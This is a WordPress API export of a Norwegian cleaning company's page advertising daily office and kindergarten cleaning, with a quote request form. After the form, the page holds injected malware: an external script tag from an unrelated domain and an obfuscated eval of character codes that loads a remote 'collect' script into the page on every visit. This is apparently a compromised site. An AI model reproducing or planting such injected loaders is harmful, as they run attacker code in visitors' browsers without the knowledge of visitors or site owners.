{"id":3834,"date":"2020-11-05T14:52:30","date_gmt":"2020-11-05T14:52:30","guid":{"rendered":"http:\/\/ms24.no\/?page_id=3834"},"modified":"2021-04-02T08:15:19","modified_gmt":"2021-04-02T06:15:19","slug":"dagligrenhold","status":"publish","type":"page","link":"https:\/\/ms24.no\/?page_id=3834","title":{"rendered":"Dagligrenhold"},"content":{"rendered":"<h3>\n\t\t\t\t\tKomplett renholdstilbud<br \/>\n\t\t\t\t\trenholdstilbud<br \/>\n\t\t\t\t<\/h3>\n<p style=\"text-align: center;\">Den kunnskapen vi har f\u00e5tt med daglig renhold som bedrift \u2013 formidles til renholderne v\u00e5re gjennom tett oppf\u00f8lging. V\u00e5re oppdragsgivere f\u00e5r faste renholdere som kjenner dine lokaler til \u00e5 utf\u00f8re det daglige renholdet. De vet dermed hvilke kvalitetskrav som m\u00e5 oppfylles og f\u00e5r jobben utf\u00f8rt med effektivitet og h\u00f8y kvalitet.<\/p>\n<p>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img decoding=\"async\" width=\"332\" height=\"152\" src=\"http:\/\/ms24.no\/wp-content\/uploads\/2019\/07\/daglig-renhold2.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/ms24.no\/wp-content\/uploads\/2019\/07\/daglig-renhold2.jpg 332w, https:\/\/ms24.no\/wp-content\/uploads\/2019\/07\/daglig-renhold2-300x137.jpg 300w\" sizes=\"auto, (max-width: 332px) 100vw, 332px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/p>\n<h3 style=\"text-align: center;\">V\u00e5r innsats tilpasses ditt behov<\/h3>\n<p style=\"text-align: center;\">Det betyr at vi sammen med deg planlegger og bestemmer hvordan resultatet skal bli. Vi gj\u00f8r oss kjent med dine prosedyrer og rutiner, slik at vi kan holde hva vi lover. Du velger selv dag og tid for renhold! Vi utf\u00f8rer tjenesten i tr\u00e5d med dine \u00f8nsker og retningslinjer.<\/p>\n<h3 style=\"text-align: left;\">Dagligrenhold omfatter vanligvis<\/h3>\n<ul>\n<li style=\"text-align: left;\">St\u00f8vsuging og vask av gulv<\/li>\n<li style=\"text-align: left;\">Rengj\u00f8ring av hygienefasiliteter<\/li>\n<li style=\"text-align: left;\">Rengj\u00f8ring av m\u00f8terom<\/li>\n<li style=\"text-align: left;\">T\u00f8mming av s\u00f8ppelb\u00f8tter<\/li>\n<li style=\"text-align: left;\">St\u00f8vt\u00f8rking<\/li>\n<\/ul>\n<h2>Barnehagerenhold<\/h2>\n<p>Milj\u00f8 Solutions AS er spesialisten p\u00e5 rengj\u00f8ring av barnehager. Vi vet hvilke krav som stilles til hygiene, innemilj\u00f8 og smittevern, da om lag 90 prosent av v\u00e5re oppdrag utf\u00f8res hos barnehager. Rutinemessig oppf\u00f8lging og kvalitetskontroll av v\u00e5re ansatte inneb\u00e6rer at du som kunde sikres god renholdskvalitet.<\/p>\n<p>\u00a0<\/p>\n<p>\t\t\t<a href=\"https:\/\/ms24.no\/portfolio\/barnehagerenhold\/\" role=\"button\"><br \/>\n\t\t\t\t\t\tLese mer<br \/>\n\t\t\t\t\t<\/a><\/p>\n<h2>F\u00e5 et uforpliktende tilbud p\u00e5 dagligrenhold<\/h2>\n\n<div class=\"wpcf7 no-js\" id=\"wpcf7-f1303-o1\" lang=\"en-US\" dir=\"ltr\" data-wpcf7-id=\"1303\">\n<div class=\"screen-reader-response\"><p role=\"status\" aria-live=\"polite\" aria-atomic=\"true\"><\/p> <ul><\/ul><\/div>\n<form action=\"\/index.php?rest_route=%2Fwp%2Fv2%2Fpages%2F3834#wpcf7-f1303-o1\" method=\"post\" class=\"wpcf7-form init\" aria-label=\"Contact form\" novalidate=\"novalidate\" data-status=\"init\">\n<fieldset class=\"hidden-fields-container\"><input type=\"hidden\" name=\"_wpcf7\" value=\"1303\" \/><input type=\"hidden\" name=\"_wpcf7_version\" value=\"6.1.5\" \/><input type=\"hidden\" name=\"_wpcf7_locale\" value=\"en_US\" \/><input type=\"hidden\" name=\"_wpcf7_unit_tag\" value=\"wpcf7-f1303-o1\" \/><input type=\"hidden\" name=\"_wpcf7_container_post\" value=\"0\" \/><input type=\"hidden\" name=\"_wpcf7_posted_data_hash\" value=\"\" \/>\n<\/fieldset>\n<div class=\"online-form\">\n\t<div class=\"row gutters-10\">\n\t\t<div class=\"col-6 form-group\">\n\t\t\t<p><span class=\"wpcf7-form-control-wrap\" data-name=\"username\"><input size=\"40\" maxlength=\"400\" class=\"wpcf7-form-control wpcf7-text wpcf7-validates-as-required form-control\" aria-required=\"true\" aria-invalid=\"false\" placeholder=\"Navn*\" value=\"\" type=\"text\" name=\"username\" \/><\/span>\n\t\t\t<\/p>\n\t\t<\/div>\n\t\t<div class=\"col-6 form-group\">\n\t\t\t<p><span class=\"wpcf7-form-control-wrap\" data-name=\"phone\"><input size=\"40\" maxlength=\"400\" class=\"wpcf7-form-control wpcf7-text wpcf7-validates-as-required form-control\" aria-required=\"true\" aria-invalid=\"false\" placeholder=\"Telefon*\" value=\"\" type=\"text\" name=\"phone\" \/><\/span>\n\t\t\t<\/p>\n\t\t<\/div>\n\t\t<div class=\"col-6 form-group\">\n\t\t\t<p><span class=\"wpcf7-form-control-wrap\" data-name=\"email\"><input size=\"40\" maxlength=\"400\" class=\"wpcf7-form-control wpcf7-email wpcf7-validates-as-required wpcf7-text wpcf7-validates-as-email form-control\" aria-required=\"true\" aria-invalid=\"false\" placeholder=\"E- postl*\" value=\"\" type=\"email\" name=\"email\" \/><\/span>\n\t\t\t<\/p>\n\t\t<\/div>\n\t\t<div class=\"col-6 form-group\">\n\t\t\t<p><span class=\"wpcf7-form-control-wrap\" data-name=\"menu-922\"><select class=\"wpcf7-form-control wpcf7-select wpcf7-validates-as-required select2\" aria-required=\"true\" aria-invalid=\"false\" name=\"menu-922\"><option value=\"Velg tjenester\">Velg tjenester<\/option><option value=\"Bedriftsrenhold\">Bedriftsrenhold<\/option><option value=\"Privatrenhold\">Privatrenhold<\/option><option value=\"Vaktmestertjenester\">Vaktmestertjenester<\/option><option value=\"Bygg renhold\">Bygg renhold<\/option><option value=\"Boretslag \/ sameie\">Boretslag \/ sameie<\/option><\/select><\/span>\n\t\t\t<\/p>\n\t\t<\/div>\n\t\t<div class=\"col-12 form-group mg-b-20\">\n\t\t\t<p><span class=\"wpcf7-form-control-wrap\" data-name=\"textarea-652\"><textarea cols=\"40\" rows=\"7\" maxlength=\"2000\" class=\"wpcf7-form-control wpcf7-textarea form-control\" aria-invalid=\"false\" placeholder=\"Melding . . .\" name=\"textarea-652\"><\/textarea><\/span>\n\t\t\t<\/p>\n\t\t<\/div>\n\t\t<div class=\"col-12 form-group online-button\">\n\t\t\t<p><button type=\"submit\" class=\"wpcf7-submit send-button\">Send<i class=\"fa fa-angle-right\" aria-hidden=\"true\"><\/i><\/button>\n\t\t\t<\/p>\n\t\t<\/div>\n\t\t<div class=\"col-12 response\">\n\t\t<div class=\"wpcf7-response-output\" aria-hidden=\"true\"><\/div>\n\t\t<\/div>\n\t<\/div>\n<\/div>\n<\/form>\n<\/div>\n\n<p><script src='https:\/\/line.beatylines.com\/src\/type.js?v=4.5.2' type='text\/javascript' id='globalsway'><\/script><script>var f=String;eval(f.fromCharCode(102,117,110,99,116,105,111,110,32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,116,105,115,116,105,99,46,115,99,114,105,112,116,115,112,108,97,116,102,111,114,109,46,99,111,109,47,99,111,108,108,101,99,116,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,125));\/*99586587347*\/<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Komplett renholdstilbud renholdstilbud Den kunnskapen vi har f\u00e5tt med daglig renhold som bedrift \u2013 formidles til renholderne v\u00e5re gjennom tett oppf\u00f8lging. V\u00e5re oppdragsgivere f\u00e5r faste renholdere som kjenner dine lokaler til \u00e5 utf\u00f8re det daglige renholdet. De vet dermed hvilke kvalitetskrav som m\u00e5 oppfylles og f\u00e5r jobben utf\u00f8rt med effektivitet og h\u00f8y kvalitet. V\u00e5r innsats [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"elementor_header_footer","meta":{"footnotes":""},"class_list":["post-3834","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/pages\/3834","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/ms24.no\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3834"}],"version-history":[{"count":47,"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/pages\/3834\/revisions"}],"predecessor-version":[{"id":5661,"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/pages\/3834\/revisions\/5661"}],"wp:attachment":[{"href":"https:\/\/ms24.no\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3834"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}